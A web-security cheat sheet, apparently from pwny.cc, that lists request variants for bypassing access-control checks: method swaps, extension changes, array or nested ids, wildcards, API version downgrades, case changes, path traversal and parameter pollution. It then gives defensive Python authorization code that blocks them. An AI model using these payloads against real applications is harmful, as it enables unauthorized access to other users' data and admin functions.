pwny.cc

Insecure Direct Object Reference (IDOR)

Change HTTP method

GET /users/delete/123 -> 403
POST /users/delete/123 -> 200

Change file extension

Try changing the file extension of the endpoint you found.

#Endpoint found
/users/password -> 401

#Endpoints to test
/users/password.json
/users/password.xml

Convert request body

Convert the identifier in the request body to an array, or nest it inside another JSON object.

#Original body
{"id":1}

#Bypasses
{"id":[1]}
{"id":{"id":1}}

Test wildcards

Replace the identifier in the request with a wildcard.

#Original request
/api/v1/userlist/user1

#Wildcard bypasses
/api/v1/userlist/*

Check another version

Many API endpoints expose the version in the request; try changing it to an older one.

#Original request
/api/v3/user/user3

#Changed version of the same endpoint
/api/v2/user/user3
/api/v1/user/user3

Missing Function Level Access Control (MFLAC)

GET /admin/profile -> 401
GET /ADMIN/profile -> 200

Path Traversal Secondary Context

#Original request
POST /users/delete/123 -> 403

#Bypass
POST /users/delete/MY_ID/../123 -> 200

HTTP Parameter Pollution

GET /api/v1/messages?user_id=ATTACKER_ID&user_id=VICTIM_ID
GET /api/v1/messages?user_id=VICTIM_ID&user_id=ATTACKER_ID
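
The server-side checks that make the request variations on this page fail, as an added defensive example (not code from this page or from any project): the path is canonicalized before the policy decision, the identifier must be a single scalar, duplicate parameters are rejected, and ownership is enforced regardless of method or API version. The OWNERS and ADMINS tables, the function names and the assumption that identifiers are lowercase alphanumerics are constructed for illustration.

```python
import json
import posixpath
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed data (assumptions): object id -> owner, and the admin principals.
OWNERS = {"1": "alice", "123": "alice", "456": "bob"}
ADMINS = {"root"}


def canonical_path(raw_path):
    """Decode, resolve dot segments, fold case and drop .json/.xml before any policy check."""
    path = "/" + posixpath.normpath(unquote(raw_path)).lstrip("/").lower()
    for ext in (".json", ".xml"):
        if path.endswith(ext):
            path = path[: -len(ext)]
    return path


def scalar_id(value):
    """Accept one alphanumeric identifier: no arrays, nested objects or wildcards."""
    if isinstance(value, bool) or not isinstance(value, (int, str)):
        raise PermissionError("identifier must be a scalar")
    if not str(value).isalnum():
        raise PermissionError("identifier has unexpected characters")
    return str(value)


def authorize(user, method, url, body=None):
    """Return the object id if `user` may act on it, else raise PermissionError.

    `method` is deliberately unused and the API version segment is never consulted,
    so every verb and version of a route gets the same ownership check.
    """
    parts = urlsplit(url)
    params = parse_qsl(parts.query, keep_blank_values=True)
    if len({name for name, _ in params}) != len(params):
        raise PermissionError("duplicate query parameter")
    path = canonical_path(parts.path)
    if path.startswith("/admin") and user not in ADMINS:
        raise PermissionError("admin function")
    candidate = dict(params).get("user_id", path.rsplit("/", 1)[-1])
    if body is not None:
        data = json.loads(body)
        candidate = data.get("id") if isinstance(data, dict) else None
    obj_id = scalar_id(candidate)
    if OWNERS.get(obj_id) != user and user not in ADMINS:
        raise PermissionError("not the owner")
    return obj_id
```

The policy decision must run on the same canonical path and parsed parameters that the handler later uses; if the two layers parse the request differently, the check and the action can disagree.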

References

  • Autorize: Burp Suite extension aimed at helping the penetration tester to detect authorization vulnerabilities
  • Auto Repeater: Burp Suite extension that automatically repeats requests, with replacement rules and response diffing